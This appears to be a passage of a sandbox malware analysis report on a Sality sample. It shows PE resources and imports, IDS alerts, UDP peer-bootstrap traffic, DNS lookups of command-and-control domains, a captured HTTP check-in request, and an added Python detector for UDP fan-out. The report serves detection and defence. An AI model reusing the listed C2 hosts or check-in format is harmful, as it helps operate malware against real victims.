RT_DIALOG | 0x66af8 | 0x286 | data | Arabic | Saudi Arabia | 0.43034055727554177
RT_DIALOG | 0x66d80 | 0x286 | data | Chinese | Taiwan | 0.43034055727554177
RT_DIALOG | 0x67008 | 0x286 | data | Czech | Czech Republic | 0.43034055727554177
RT_DIALOG | 0x67290 | 0x286 | data | Danish | Denmark | 0.43034055727554177
RT_DIALOG | 0x67518 | 0x286 | data | German | Germany | 0.43034055727554177
RT_DIALOG | 0x677a0 | 0x286 | data | Greek | Greece | 0.43034055727554177
RT_DIALOG | 0x67a28 | 0x286 | data | English | United States | 0.43034055727554177
RT_DIALOG | 0x67cb0 | 0x286 | data | Finnish | Finland | 0.43034055727554177
RT_DIALOG | 0x67f38 | 0x286 | data | French | France | 0.43034055727554177
RT_DIALOG | 0x681c0 | 0x286 | data | Hebrew | Israel | 0.43034055727554177
RT_DIALOG | 0x68448 | 0x286 | data | Hungarian | Hungary | 0.43034055727554177
RT_DIALOG | 0x686d0 | 0x286 | data | Italian | Italy | 0.43034055727554177
RT_DIALOG | 0x68958 | 0x286 | data | Japanese | Japan | 0.43034055727554177
RT_DIALOG | 0x68be0 | 0x286 | data | Korean | North Korea | 0.43034055727554177
RT_DIALOG | 0x68be0 | 0x286 | data | Korean | South Korea | 0.43034055727554177
RT_DIALOG | 0x68e68 | 0x286 | data | Dutch | Netherlands | 0.43034055727554177
RT_DIALOG | 0x690f0 | 0x286 | data | Norwegian | Norway | 0.43034055727554177
RT_DIALOG | 0x69378 | 0x286 | data | Polish | Poland | 0.43034055727554177
RT_DIALOG | 0x69600 | 0x286 | data | Portuguese | Brazil | 0.43034055727554177
RT_DIALOG | 0x69888 | 0x286 | data | Russian | Russia | 0.43034055727554177
RT_DIALOG | 0x69b10 | 0x286 | data | Slovak | Slovakia | 0.43034055727554177
RT_DIALOG | 0x69d98 | 0x286 | data | Swedish | Sweden | 0.43034055727554177
RT_DIALOG | 0x6a020 | 0x286 | data | Thai | Thailand | 0.43034055727554177
RT_DIALOG | 0x6a2a8 | 0x286 | data | Turkish | Turkey | 0.43034055727554177
RT_DIALOG | 0x6a530 | 0x286 | data | Slovenian | Slovenia | 0.43034055727554177
RT_DIALOG | 0x6a7b8 | 0x286 | data | Chinese | China | 0.43034055727554177
RT_DIALOG | 0x6aa40 | 0x286 | data | Spanish | Mexico | 0.43034055727554177
RT_DIALOG | 0x6acc8 | 0x286 | data | Portuguese | Portugal | 0.43034055727554177
RT_DIALOG | 0x6af50 | 0x286 | data | | | 0.43034055727554177
RT_STRING | 0x6b1d8 | 0x7d0 | Targa image data 1575 x 1569 x 32 +1604 +1594 | Arabic | Saudi Arabia | 0.2805
RT_STRING | 0x6b9a8 | 0x2c0 | Targa image data - Mono - RLE 73 x 65 x 32 +73 +68 | Chinese | Taiwan | 0.6463068181818182
RT_STRING | 0x6bc68 | 0x7b6 | data | Czech | Czech Republic | 0.31762917933130697
RT_STRING | 0x6c420 | 0x8a0 | data | Danish | Denmark | 0.2749094202898551
RT_STRING | 0x6ccc0 | 0xa62 | data | German | Germany | 0.2618510158013544
                                RT_STRING0x6d7240xa7adataGreekGreece0.28448918717375093
                                RT_STRING0x6e1a00xae2Targa image data 73 x 65 x 32 +73 +68EnglishUnited States0.2663316582914573
                                RT_STRING0x6ec840x910Targa image data - RLE 73 x 65 x 32 +73 +68FinnishFinland0.2495689655172414
                                RT_STRING0x6f5940xa58dataFrenchFrance0.256797583081571
                                RT_STRING0x6ffec0x724dataHebrewIsrael0.30306345733041573
                                RT_STRING0x707100x970dataHungarianHungary0.29635761589403975
                                RT_STRING0x710800x900dataItalianItaly0.2690972222222222
                                RT_STRING0x719800x450Targa image data 73 x 65 x 32 +73 +68JapaneseJapan0.5018115942028986
                                RT_STRING0x71dd00x436dataKoreanNorth Korea0.5111317254174397
                                RT_STRING0x71dd00x436dataKoreanSouth Korea0.5111317254174397
                                RT_STRING0x722080x9e6dataDutchNetherlands0.27782162588792425
                                RT_STRING0x72bf00x8b4dataNorwegianNorway0.2751346499102334
                                RT_STRING0x734a40x8aadataPolishPoland0.2944093778178539
                                RT_STRING0x73d500x9c6dataPortugueseBrazil0.2685851318944844
                                RT_STRING0x747180x86edataRussianRussia0.3002780352177943
                                RT_STRING0x74f880x7d6dataSlovakSlovakia0.3135593220338983
                                RT_STRING0x757600x85cTarga image data 73 x 65 x 32 +73 +68SwedishSweden0.2841121495327103
                                RT_STRING0x75fbc0x8c2dataThaiThailand0.3050847457627119
                                RT_STRING0x768800x920dataTurkishTurkey0.2872431506849315
                                RT_STRING0x771a00x88cdataSlovenianSlovenia0.29570383912248627
                                RT_STRING0x77a2c0x2c4Targa image data - Map - RLE 73 x 65 x 32 +73 +68ChineseChina0.6384180790960452
                                RT_STRING0x77cf00x98adataSpanishMexico0.2571662571662572
                                RT_STRING0x7867c0x95cdataPortuguesePortugal0.2742070116861436
                                RT_STRING0x78fd80xa1cdata0.250386398763524
                                RT_STRING0x799f40x5cdataArabicSaudi Arabia0.7065217391304348
                                RT_STRING0x79a500x48dataChineseTaiwan0.7361111111111112
                                RT_STRING0x79a980x64dataCzechCzech Republic0.74
                                RT_STRING0x79afc0x54dataDanishDenmark0.7023809523809523
                                RT_STRING0x79b500x5cdataGermanGermany0.6739130434782609
                                RT_STRING0x79bac0x82dataGreekGreece0.6692307692307692
                                RT_STRING0x79c300x54dataEnglishUnited States0.6904761904761905
                                RT_STRING0x79c840x5cdataFinnishFinland0.6956521739130435
                                RT_STRING0x79ce00x64dataFrenchFrance0.65
                                RT_STRING0x79d440x4edataHebrewIsrael0.7307692307692307
                                RT_STRING0x79d940x76dataHungarianHungary0.7288135593220338
                                RT_STRING0x79e0c0x5cdataItalianItaly0.6739130434782609
                                RT_STRING0x79e680x54dataJapaneseJapan0.7619047619047619
                                RT_STRING0x79ebc0x4adataKoreanNorth Korea0.7567567567567568
                                RT_STRING0x79ebc0x4adataKoreanSouth Korea0.7567567567567568
                                RT_STRING0x79f080x6edataDutchNetherlands0.7090909090909091
                                RT_STRING0x79f780x54dataNorwegianNorway0.7023809523809523
                                RT_STRING0x79fcc0x62dataPolishPoland0.7040816326530612
                                RT_STRING0x7a0300x60dataPortugueseBrazil0.6041666666666666
                                RT_STRING0x7a0900x58dataRussianRussia0.7272727272727273
                                RT_STRING0x7a0e80x60dataSlovakSlovakia0.7395833333333334
                                RT_STRING0x7a1480x64dataSwedishSweden0.7
                                RT_STRING0x7a1ac0x66dataThaiThailand0.7549019607843137
                                RT_STRING0x7a2140x5edataTurkishTurkey0.7021276595744681
                                RT_STRING0x7a2740x5cdataSlovenianSlovenia0.6739130434782609
                                RT_STRING0x7a2d00x4adataChineseChina0.7432432432432432
                                RT_STRING0x7a31c0x70dataSpanishMexico0.6607142857142857
                                RT_STRING0x7a38c0x72dataPortuguesePortugal0.6491228070175439
                                RT_STRING0x7a4000x74data0.646551724137931
                                RT_ACCELERATOR0x7a4740x8dataEnglishUnited States2.0
                                RT_GROUP_ICON0x7a47c0x84dataEnglishUnited States0.6363636363636364
                                RT_GROUP_ICON0x7a5000x14dataEnglishUnited States1.25
                                RT_GROUP_ICON0x7a5140x14dataEnglishUnited States1.25
                                RT_VERSION0x7a5280x310dataArabicSaudi Arabia0.4375
                                RT_MANIFEST0x7a8380x281ASCII text, with CRLF line terminatorsEnglishUnited States0.4711388455538221
DLL | Imports
VERSION.dll | GetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA
SETUPAPI.dll | SetupDiGetDeviceRegistryPropertyA, SetupDiEnumDeviceInfo, SetupDiGetClassDevsA, SetupDiGetDeviceInstanceIdA, SetupDiClassGuidsFromNameA, SetupDiGetINFClassA, SetupDiGetDeviceInstallParamsA, SetupDiCallClassInstaller, SetupDiEnumDriverInfoA, SetupDiBuildDriverInfoList, SetupDiSetDeviceInstallParamsA, SetupDiRegisterDeviceInfo, SetupDiSetDeviceRegistryPropertyA, SetupDiCreateDeviceInfoA, SetupDiCreateDeviceInfoList, SetupDiDestroyDriverInfoList, SetupDiSetSelectedDevice, SetupDiGetDriverInfoDetailA, SetupDiRemoveDevice, SetupDiDestroyDeviceInfoList
COMCTL32.dll | (no named imports listed)
SHLWAPI.dll | PathAppendA, PathUnquoteSpacesA, PathIsDirectoryA, PathIsRelativeA
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, CreateProcessA, FindClose, FindNextFileA, SetLastError, FindFirstFileA, GetSystemDirectoryA, GetProcAddress, GetModuleHandleA, Sleep, GetModuleFileNameA, SetCurrentDirectoryA, GetFullPathNameA, DeleteFileA, SetFileAttributesA, GetFileAttributesA, GetVersionExA, GetComputerNameA, GetUserDefaultLangID, GetCurrentDirectoryA, GetWindowsDirectoryA, GetCurrentProcess, ReleaseMutex, CreateDirectoryA, MapViewOfFile, CreateFileMappingA, CreateMutexA, UnmapViewOfFile, GetTimeFormatA, GetLocalTime, OutputDebugStringA, lstrcpynA, MoveFileExA, LocalAlloc, GetCurrentThread, FreeLibrary, SetEnvironmentVariableA, Module32First, CreateToolhelp32Snapshot, Process32Next, Process32First, GetLastError, OpenProcess, MultiByteToWideChar, DeviceIoControl, CreateFileA, CloseHandle, GlobalFree, GlobalUnlock, GlobalLock, GlobalAlloc, CopyFileA, GetCurrentProcessId, GetCurrentThreadId, RemoveDirectoryA, WriteFile, SetFilePointer, DeleteCriticalSection, GetFileType, GetStdHandle, SetHandleCount, LeaveCriticalSection, EnterCriticalSection, RaiseException, LCMapStringW, WideCharToMultiByte, LCMapStringA, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, IsValidCodePage, ReadFile, GetOEMCP, GetACP, InterlockedDecrement, InterlockedIncrement, GetCPInfo, GetStartupInfoA, GetProcessHeap, HeapAlloc, FormatMessageA, LocalFree, LoadLibraryA, InitializeCriticalSection, GetConsoleCP, GetConsoleMode, GetPrivateProfileStringA, WinExec, FlushFileBuffers, GetSystemTimeAsFileTime, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, HeapSize, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, TerminateProcess, GetCommandLineA, RtlUnwind, HeapFree, CompareStringW, CompareStringA, SetEndOfFile, SetStdHandle, ExitProcess
USER32.dll | EndDeferWindowPos, MessageBoxA, LoadStringA, LoadImageA, BeginDeferWindowPos, GetWindowRect, UpdateWindow, ShowWindow, GetClientRect, GetSystemMetrics, SendMessageA, OffsetRect, CopyRect, GetParent, CheckDlgButton, SetDlgItemTextA, GetDlgItem, EnableWindow, IsDlgButtonChecked, LoadBitmapA, GetWindowThreadProcessId, EnumWindows, DialogBoxParamA, GetWindowInfo, ExitWindowsEx, CreateWindowExA, SetWindowPos, GetDesktopWindow, DeferWindowPos, EndDialog
ADVAPI32.dll | OpenSCManagerA, OpenServiceA, ControlService, QueryServiceStatus, DeleteService, CloseServiceHandle, ImpersonateSelf, OpenThreadToken, AllocateAndInitializeSid, InitializeSecurityDescriptor, GetLengthSid, InitializeAcl, AddAccessAllowedAce, SetSecurityDescriptorDacl, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, IsValidSecurityDescriptor, AccessCheck, RevertToSelf, FreeSid, RegDeleteValueA, RegEnumValueA, RegEnumKeyExA, RegQueryInfoKeyA, RegDeleteKeyA, LookupPrivilegeValueA, OpenProcessToken, AdjustTokenPrivileges, RegSetValueExA, GetUserNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegCreateKeyExA
SHELL32.dll | SHGetSpecialFolderPathA, SHGetFolderPathA
ole32.dll | CoUninitialize, CoCreateInstance, CoInitialize, CoSetProxyBlanket
OLEAUT32.dll | SysStringLen, SysAllocStringLen, SysFreeString
Language of compilation system | Country where language is spoken
Arabic | Saudi Arabia
English | United States
Chinese | Taiwan
Czech | Czech Republic
Danish | Denmark
German | Germany
Greek | Greece
Finnish | Finland
French | France
Hebrew | Israel
Hungarian | Hungary
Italian | Italy
Japanese | Japan
Korean | North Korea
Korean | South Korea
Dutch | Netherlands
Norwegian | Norway
Polish | Poland
Portuguese | Brazil
Russian | Russia
Slovak | Slovakia
Swedish | Sweden
Thai | Thailand
Turkish | Turkey
Slovenian | Slovenia
Chinese | China
Spanish | Mexico
Portuguese | Portugal
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-25T13:45:08.202500+0200 | TCP | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 49710 | 80 | 192.168.2.8 | 107.172.18.180
2024-07-25T13:45:06.951501+0200 | TCP | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 49709 | 80 | 192.168.2.8 | 193.109.247.16
2024-07-25T13:45:22.156809+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49715 | 13.85.23.86 | 192.168.2.8
2024-07-25T13:46:00.464743+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49722 | 13.85.23.86 | 192.168.2.8
Note: the two Sality-GR check-in alerts correspond one-to-one to the plaintext HTTP requests in sessions 0 and 1 below. The two CVE-2016-2211 alerts fire on inbound port-443 (TLS) data from 13.85.23.86 toward client ports 49715 and 49722; neither that host nor those ports appear in the sample's HTTP sessions or in the TCP packet list, and the signature is matching bytes inside an encrypted stream, so treat them as a probable false positive rather than as exploitation by or against the sample.
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 13:45:06.189862013 CEST | 49709 | 80 | 192.168.2.8 | 193.109.247.16
Jul 25, 2024 13:45:06.194993973 CEST | 80 | 49709 | 193.109.247.16 | 192.168.2.8
Jul 25, 2024 13:45:06.198146105 CEST | 49709 | 80 | 192.168.2.8 | 193.109.247.16
Jul 25, 2024 13:45:06.198146105 CEST | 49709 | 80 | 192.168.2.8 | 193.109.247.16
Jul 25, 2024 13:45:06.203036070 CEST | 80 | 49709 | 193.109.247.16 | 192.168.2.8
Jul 25, 2024 13:45:06.935741901 CEST | 80 | 49709 | 193.109.247.16 | 192.168.2.8
Jul 25, 2024 13:45:06.936081886 CEST | 80 | 49709 | 193.109.247.16 | 192.168.2.8
Jul 25, 2024 13:45:06.936094046 CEST | 80 | 49709 | 193.109.247.16 | 192.168.2.8
Jul 25, 2024 13:45:06.937660933 CEST | 80 | 49709 | 193.109.247.16 | 192.168.2.8
Jul 25, 2024 13:45:06.951500893 CEST | 49709 | 80 | 192.168.2.8 | 193.109.247.16
Jul 25, 2024 13:45:07.082715034 CEST | 80 | 49709 | 193.109.247.16 | 192.168.2.8
Jul 25, 2024 13:45:07.083062887 CEST | 80 | 49709 | 193.109.247.16 | 192.168.2.8
Jul 25, 2024 13:45:07.083090067 CEST | 80 | 49709 | 193.109.247.16 | 192.168.2.8
Jul 25, 2024 13:45:07.088684082 CEST | 49709 | 80 | 192.168.2.8 | 193.109.247.16
Jul 25, 2024 13:45:07.702261925 CEST | 49710 | 80 | 192.168.2.8 | 107.172.18.180
Jul 25, 2024 13:45:07.708283901 CEST | 80 | 49710 | 107.172.18.180 | 192.168.2.8
Jul 25, 2024 13:45:07.708523035 CEST | 49710 | 80 | 192.168.2.8 | 107.172.18.180
Jul 25, 2024 13:45:07.708813906 CEST | 49710 | 80 | 192.168.2.8 | 107.172.18.180
Jul 25, 2024 13:45:07.716794014 CEST | 80 | 49710 | 107.172.18.180 | 192.168.2.8
Jul 25, 2024 13:45:08.191555023 CEST | 80 | 49710 | 107.172.18.180 | 192.168.2.8
Jul 25, 2024 13:45:08.202500105 CEST | 49710 | 80 | 192.168.2.8 | 107.172.18.180
Jul 25, 2024 13:45:08.223803043 CEST | 49712 | 443 | 192.168.2.8 | 195.201.126.132
Jul 25, 2024 13:45:08.223840952 CEST | 443 | 49712 | 195.201.126.132 | 192.168.2.8
Jul 25, 2024 13:45:08.227215052 CEST | 49712 | 443 | 192.168.2.8 | 195.201.126.132
Jul 25, 2024 13:45:08.242625952 CEST | 49712 | 443 | 192.168.2.8 | 195.201.126.132
Jul 25, 2024 13:45:08.242655993 CEST | 443 | 49712 | 195.201.126.132 | 192.168.2.8
Jul 25, 2024 13:45:08.933650017 CEST | 443 | 49712 | 195.201.126.132 | 192.168.2.8
Jul 25, 2024 13:45:08.933916092 CEST | 49712 | 443 | 192.168.2.8 | 195.201.126.132
Jul 25, 2024 13:45:09.923372984 CEST | 49709 | 80 | 192.168.2.8 | 193.109.247.16
Jul 25, 2024 13:45:09.923602104 CEST | 49710 | 80 | 192.168.2.8 | 107.172.18.180
Jul 25, 2024 13:45:09.923697948 CEST | 49712 | 443 | 192.168.2.8 | 195.201.126.132
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 13:45:02.513236046 CEST | 50152 | 1743 | 192.168.2.8 | 94.76.218.18
Jul 25, 2024 13:45:03.069250107 CEST | 50153 | 1743 | 192.168.2.8 | 94.76.206.216
Jul 25, 2024 13:45:03.622994900 CEST | 50154 | 8040 | 192.168.2.8 | 189.68.58.176
Jul 25, 2024 13:45:04.092767954 CEST | 50155 | 6724 | 192.168.2.8 | 81.190.94.112
Jul 25, 2024 13:45:04.615726948 CEST | 50156 | 4956 | 192.168.2.8 | 77.122.85.173
Jul 25, 2024 13:45:05.162873983 CEST | 50157 | 6820 | 192.168.2.8 | 201.45.100.171
Jul 25, 2024 13:45:05.694794893 CEST | 50158 | 5630 | 192.168.2.8 | 217.70.126.141
Jul 25, 2024 13:45:05.994374037 CEST | 53963 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:06.092278957 CEST | 53 | 53963 | 1.1.1.1 | 192.168.2.8
Jul 25, 2024 13:45:06.119759083 CEST | 55413 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:06.171686888 CEST | 53 | 55413 | 1.1.1.1 | 192.168.2.8
Jul 25, 2024 13:45:06.242580891 CEST | 55414 | 5569 | 192.168.2.8 | 81.10.9.50
Jul 25, 2024 13:45:06.763325930 CEST | 55415 | 4580 | 192.168.2.8 | 94.50.7.74
Jul 25, 2024 13:45:07.201972961 CEST | 54731 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:07.302602053 CEST | 54732 | 7886 | 192.168.2.8 | 77.39.42.64
Jul 25, 2024 13:45:07.556024075 CEST | 53 | 54731 | 1.1.1.1 | 192.168.2.8
Jul 25, 2024 13:45:07.565112114 CEST | 61918 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:07.700921059 CEST | 53 | 61918 | 1.1.1.1 | 192.168.2.8
Jul 25, 2024 13:45:07.837656021 CEST | 61919 | 7886 | 192.168.2.8 | 80.69.51.98
Jul 25, 2024 13:45:08.206958055 CEST | 63101 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:08.216058969 CEST | 53 | 63101 | 1.1.1.1 | 192.168.2.8
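The UDP list above shows the sample, within about five seconds of starting and before any DNS lookup, sending single datagrams to eleven unrelated public hosts on arbitrary high ports (1743, 8040, 6724, ...): the peer-list bootstrap that Sality's P2P layer performs, and the behaviour behind the "Connects to several IPs in different countries" signature. The script below is an added example and not part of the Joe Sandbox report; it runs a sliding-window fan-out heuristic over the rows transcribed from this table. The window length, the peer threshold and the internal-to-public filter are the author's assumptions, not values from any published rule, and the timestamp parser assumes all rows fall on the same day.

```python
"""UDP fan-out heuristic for the peer-bootstrap burst in the report's UDP packet list.

Added example, not part of the Joe Sandbox report. SAMPLE_UDP_ROWS is transcribed
from the page's UDP table; window_s and min_peers are the author's assumptions.
"""
import ipaddress
from collections import defaultdict, namedtuple

Packet = namedtuple("Packet", "t sport dport src dst")

# Transcribed from the report: timestamp | src port | dst port | src IP | dst IP
SAMPLE_UDP_ROWS = """\
Jul 25, 2024 13:45:02.513236046 CEST | 50152 | 1743 | 192.168.2.8 | 94.76.218.18
Jul 25, 2024 13:45:03.069250107 CEST | 50153 | 1743 | 192.168.2.8 | 94.76.206.216
Jul 25, 2024 13:45:03.622994900 CEST | 50154 | 8040 | 192.168.2.8 | 189.68.58.176
Jul 25, 2024 13:45:04.092767954 CEST | 50155 | 6724 | 192.168.2.8 | 81.190.94.112
Jul 25, 2024 13:45:04.615726948 CEST | 50156 | 4956 | 192.168.2.8 | 77.122.85.173
Jul 25, 2024 13:45:05.162873983 CEST | 50157 | 6820 | 192.168.2.8 | 201.45.100.171
Jul 25, 2024 13:45:05.694794893 CEST | 50158 | 5630 | 192.168.2.8 | 217.70.126.141
Jul 25, 2024 13:45:05.994374037 CEST | 53963 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:06.092278957 CEST | 53 | 53963 | 1.1.1.1 | 192.168.2.8
Jul 25, 2024 13:45:06.119759083 CEST | 55413 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:06.171686888 CEST | 53 | 55413 | 1.1.1.1 | 192.168.2.8
Jul 25, 2024 13:45:06.242580891 CEST | 55414 | 5569 | 192.168.2.8 | 81.10.9.50
Jul 25, 2024 13:45:06.763325930 CEST | 55415 | 4580 | 192.168.2.8 | 94.50.7.74
Jul 25, 2024 13:45:07.201972961 CEST | 54731 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:07.302602053 CEST | 54732 | 7886 | 192.168.2.8 | 77.39.42.64
Jul 25, 2024 13:45:07.556024075 CEST | 53 | 54731 | 1.1.1.1 | 192.168.2.8
Jul 25, 2024 13:45:07.565112114 CEST | 61918 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:07.700921059 CEST | 53 | 61918 | 1.1.1.1 | 192.168.2.8
Jul 25, 2024 13:45:07.837656021 CEST | 61919 | 7886 | 192.168.2.8 | 80.69.51.98
Jul 25, 2024 13:45:08.206958055 CEST | 63101 | 53 | 192.168.2.8 | 1.1.1.1
Jul 25, 2024 13:45:08.216058969 CEST | 53 | 63101 | 1.1.1.1 | 192.168.2.8
"""


def _seconds_of_day(stamp):
    """'Jul 25, 2024 13:45:02.513236046 CEST' -> seconds since midnight.
    Assumption: every row is from the same day, so date and zone are ignored."""
    clock = stamp.split(" ")[3]
    h, m, s = clock.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_rows(text):
    """Parse the pipe-separated rows into Packet tuples."""
    packets = []
    for line in text.strip().splitlines():
        stamp, sport, dport, src, dst = [f.strip() for f in line.split("|")]
        packets.append(Packet(_seconds_of_day(stamp), int(sport), int(dport), src, dst))
    return packets


def udp_fanout(packets, window_s=5.0, min_peers=5):
    """For each internal source, find the largest number of distinct public, non-DNS
    UDP destinations it reached inside any window_s-second window; return only the
    sources that reached at least min_peers."""
    by_src = defaultdict(list)
    for p in packets:
        src, dst = ipaddress.ip_address(p.src), ipaddress.ip_address(p.dst)
        if p.dport == 53 or not src.is_private or dst.is_private:
            continue  # drop DNS, replies from outside, and internal-only traffic
        by_src[p.src].append(p)
    flagged = {}
    for src, pk in by_src.items():
        pk.sort(key=lambda p: p.t)
        best = 0
        for first in pk:  # window anchored at each packet in turn
            peers = {p.dst for p in pk if first.t <= p.t <= first.t + window_s}
            best = max(best, len(peers))
        if best >= min_peers:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    print(udp_fanout(parse_rows(SAMPLE_UDP_ROWS)))  # {'192.168.2.8': 10}
```

On these rows the host reaches ten distinct public peers inside one five-second window; the DNS exchanges with 1.1.1.1 are filtered out so they do not inflate the count. In production the same logic runs over flow records rather than a transcribed table, and the threshold has to be tuned against legitimate UDP fan-out such as NTP pools, STUN and BitTorrent.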
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 25, 2024 13:45:05.994374037 CEST | 192.168.2.8 | 1.1.1.1 | 0xec95 | Standard query (0) | lpbmx.ru | A (IP address) | IN (0x0001) | false
Jul 25, 2024 13:45:06.119759083 CEST | 192.168.2.8 | 1.1.1.1 | 0x705 | Standard query (0) | macedonia.my1.ru | A (IP address) | IN (0x0001) | false
Jul 25, 2024 13:45:07.201972961 CEST | 192.168.2.8 | 1.1.1.1 | 0xb470 | Standard query (0) | jrsx.jre.net.cn | A (IP address) | IN (0x0001) | false
Jul 25, 2024 13:45:07.565112114 CEST | 192.168.2.8 | 1.1.1.1 | 0x4fbc | Standard query (0) | steamboy.h17.ru | A (IP address) | IN (0x0001) | false
Jul 25, 2024 13:45:08.206958055 CEST | 192.168.2.8 | 1.1.1.1 | 0x8a54 | Standard query (0) | www.otzywy.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 25, 2024 13:45:06.092278957 CEST | 1.1.1.1 | 192.168.2.8 | 0xec95 | Name error (3) | lpbmx.ru | none | none | A (IP address) | IN (0x0001) | false
Jul 25, 2024 13:45:06.171686888 CEST | 1.1.1.1 | 192.168.2.8 | 0x705 | No error (0) | macedonia.my1.ru | - | 193.109.247.16 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 13:45:07.556024075 CEST | 1.1.1.1 | 192.168.2.8 | 0xb470 | Name error (3) | jrsx.jre.net.cn | none | none | A (IP address) | IN (0x0001) | false
Jul 25, 2024 13:45:07.700921059 CEST | 1.1.1.1 | 192.168.2.8 | 0x4fbc | No error (0) | steamboy.h17.ru | - | 107.172.18.180 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 13:45:08.216058969 CEST | 1.1.1.1 | 192.168.2.8 | 0x8a54 | No error (0) | www.otzywy.com | otzywy.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 13:45:08.216058969 CEST | 1.1.1.1 | 192.168.2.8 | 0x8a54 | No error (0) | otzywy.com | - | 195.201.126.132 | A (IP address) | IN (0x0001) | false
                                • macedonia.my1.ru
                                • steamboy.h17.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49709 | 193.109.247.16 | 80 | 7092 | C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
Timestamp | Bytes transferred | Direction | Data
Jul 25, 2024 13:45:06.198146105 CEST | 140 | OUT | GET /mainh.gif?7231d3=37419295 HTTP/1.1
                                User-Agent: Opera/8.89 (Windows NT 6.0; U; en)
                                Host: macedonia.my1.ru
                                Cache-Control: no-cache
Jul 25, 2024 13:45:06.935741901 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.8.0
                                Date: Thu, 25 Jul 2024 11:45:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Keep-Alive: timeout=15
                                Data Raw: 31 63 36 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 54 54 50 20 34 30 34 20 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 20 66 6f 6e 74 3a 20 31 32 70 78 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 62 6f 64 79 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 33 32 61 32 63 66 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 62 6f 64 79 20 61 3a 68 6f 76 65 72 20 [TRUNCATED]
                                Data Ascii: 1c6a<!DOCTYPE html><html><head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>HTTP 404 Resource not found</title><style type="text/css">body {margin: 0; padding: 0; background: #fff; font: 12px/22px 'Verdana'; color: #686868;}body a {color: #32a2cf; text-decoration: underline;}body a:hover {text-decoration: none;}td, input, select, textarea {font: 12px /22px 'Verdana'; color: #686868;}.clear {clear: both;}.content {width: 735px; margin: auto;}/*--------header------*/#header {height: 55px; background: url(/.s/img/err/404-header-line.gif) repeat-x 0 40px;}#logo {float: left; margin: 0; padding: 26px 0 0 0; width: 43px; height: 27px;}#logo a {display: block; padding: 0 9px; width: 43px; height: 27px; overflow: hidden; outline: none; text-indent: -9999px; background: #fff url(/.s/img/err/404-logo.png) no-repeat center center;}.site-create {float: right; margin: 26px 0 0 0; display: block; padding: 0 5px 0 15px; font: 11px/26px 'Verdana'; color: #6 [TRUNCATED]
